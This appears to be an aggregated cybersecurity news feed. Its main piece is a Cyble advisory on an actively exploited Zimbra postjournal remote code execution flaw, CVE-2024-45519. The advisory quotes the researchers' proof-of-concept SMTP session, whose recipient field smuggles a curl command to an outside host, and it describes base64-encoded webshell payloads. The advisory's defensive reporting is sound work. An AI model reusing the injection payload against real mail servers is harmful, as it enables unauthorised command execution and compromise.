ESET Research details the tools and activities of a new China-aligned threat actor, CeranaKeeper, focusing on massive data exfiltration in Southeast Asia
WeLiveSecurity – Read More
A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.
A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.
The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.
A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.
The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.
Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.
Patched versions include these versions and newer:
9.0.0 Patch 41
10.0.9
10.1.1
8.8.15 Patch 46
One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.
Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.
The researchers reversed the postjournal binary and found that there were no calls to execvp or the run_command function. Instead, a direct call to popen was made in the read_maps function, allowing input to be passed without sanitization. The cmd argument passed to popen in double quotes would prevent command injection with simple shell metacharacters, but that control could be bypassed with $() syntax.
The postjournal service was then exploited via port 10027 with the following SMTP commands:
EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <“aabbb$(curl${IFS}oast.me)”@mail.domain.com>
DATA
Test message
.
The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:
zmlocalconfig -e postjournal_enabled=true
zmcontrol restart
To enable remote exploit, the researchers found that the mynetworks default configuration included a /20 CIDR range of their public IP address, which could allow the exploit to be performed remotely if the postjournal service is enabled and the attacker is within the allowed network range.
Proofpoint researchers have observed the vulnerability under exploitation, with spoofing emails sent to fake addresses in CC fields to try to get Zimbra servers to parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.
Some of the emails used CC’d addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and if connected, the base64 blobs decode to a command to write a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).
Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.
Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:
cveID
vendorProject
product
vulnerabilityName
CVE-2023-37580
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-27926
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-41352
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-27925
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-37042
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability
CVE-2022-27924
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Command Injection Vulnerability
CVE-2018-6882
Zimbra
Collaboration Suite (ZCS)
Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-24682
Zimbra
Webmail
Zimbra Webmail Cross-Site Scripting Vulnerability
While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.
All Zimbra administrators should:
Disable postjournal if not needed
Configure mynetworks to prevent unauthorized access
Apply the latest security updates directly from Zimbra
The post Zimbra Remote Code Execution Vulnerability Under Active Attack appeared first on Cyble.
Blog – Cyble – Read More
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a security flaw impacting Endpoint Manager (EPM) that the company patched in May to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The vulnerability, tracked as CVE-2024-29824, carries a CVSS score of 9.6 out of a maximum of 10.0, indicating critical severity.
“An
The Hacker News – Read More
CeranaKeeper is bombarding Southeast Asia with data exfiltration attacks via file-sharing services such as Pastebin, OneDrive, and GitHub, researchers say.
darkreading – Read More
Organizations can use this guide to make decisions for designing, implementing, and managing OT environments to ensure they are both safe and secure, as well as enable business continuity for critical services.
darkreading – Read More
Generative AI is being used to make cyberscams more believable. Here’s how organizations can counter that using newly emerging tools and reliable methods.
darkreading – Read More
A set of bugs that has caused alarm among cybersecurity experts may enable threat actors to launch powerful attacks designed to knock systems offline.
The Record from Recorded Future News – Read More
All an attacker needs to exploit flaws in the Common Unix Printing System is a few seconds and less than 1 cent in computing costs.
darkreading – Read More
Despite a $10 million bounty on one member, APT45 is not slowing down, pivoting from intelligence gathering to extorting funds for Kim Jong-Un’s regime.
darkreading – Read More
A very troubling trend in recent years has been the rising number of cyberattacks targeting educational institutions. The United States, for instance, has seen school education become one of the most targeted sectors. According to the UK’s Information Commissioner’s Office (ICO), the number of attacks on schools increased by 55% from 2022 to 2023. A similar pattern is emerging globally. Let’s unpick what’s going on here, and look at the ways schools can defend themselves.
Several factors contribute to the growing vulnerability of schools, making them attractive targets for cybercriminals:
Dependence on technology. Educational institutions are rapidly becoming digital and are thus reliant on IT infrastructure both in the classroom and in schools’ administration offices. However, their cybersecurity practices are often sadly lacking.
Valuable data. Schools store a wealth of sensitive information, including student and staff data, and financial records. Data breaches can have devastating consequences, and this data is exactly what attackers are after.
Scarce resources. Schools often face tight budgets and a shortage of qualified IT professionals — especially in cybersecurity.
Low user awareness. A great many computer users in schools have little cybersecurity nous. This means they’re susceptible to phishing attacks, malware infections, and other cyberthreats. Often, teachers aren’t much more cyber-savvy.
This all turns educational institutions into sitting ducks. What’s more, successful attacks attract plenty of public attention, which gives cybercriminals leverage — particularly in ransom negotiations following a ransomware attack. The essential nature and social importance of educational institutions also play a significant role.
Sure, if a ransomware attack temporarily shuts a retail chain down, it’s unpleasant — but mostly just for the business itself; customers can generally go elsewhere quite easily. However, if a cyberattack disrupts a school, the consequences are far more serious. Students lose access to education, their academic performance suffers, and parents get landed with arranging childcare and other headaches.
Attacks on education are now so common that you don’t have to look far for examples of even large-scale incidents — just look at recent headlines. Not so long ago, a cyberattack targeted Highline Public Schools, a school district in Washington state in the US. The incident forced the district to temporarily close all 34 of its schools — affecting over 17,000 students. All educational activities, including athletics and meetings, were suspended.
In August of this year, the Singapore Ministry of Education announced that an unknown hacker had wiped clean 13,000 iPads and Chromebooks used by students across the country.
In June, the Toronto District School Board, which oversees nearly 600 schools in Canada’s largest city, was hit by a ransomware attack. In May, Western Sydney University, one of Australia’s largest universities with over 35,000 students, reported a hack on its IT infrastructure.
With the education sector firmly in the crosshairs of cybercriminals, schools’ IT systems need robust protection.
So how to get it? While large schools, colleges, and universities can allocate substantial budgets for enterprise-grade software and dedicated cybersecurity staff, smaller schools often lack these resources.
As a result, these schools sometimes resort to using security software intended for home use. However, this isn’t ideal. Such products aren’t designed for centralized management, so deploying them across numerous school computers, let alone managing them effectively, can become a major headache.
A far better solution for small schools would be a product designed for small and medium businesses (SMB), such as Kaspersky Small Office Security. Such security software offers all the essential features needed for basic security:
Reliable protection against ransomware and other malware
Automatic backups
Password manager to protect accounts
Vulnerability scanning and much more
Furthermore, SMB security solutions is easy to deploy, and it can operate on an “install and forget” basis — no dedicated IT or security specialist is required for setup and management.
To strengthen school cybersecurity further, we also recommend conducting staff training to raise awareness of cyberthreats. This is easy to set up with our Kaspersky Automated Security Awareness Platform, which helps slash both the time and cost of training.
Kaspersky official blog – Read More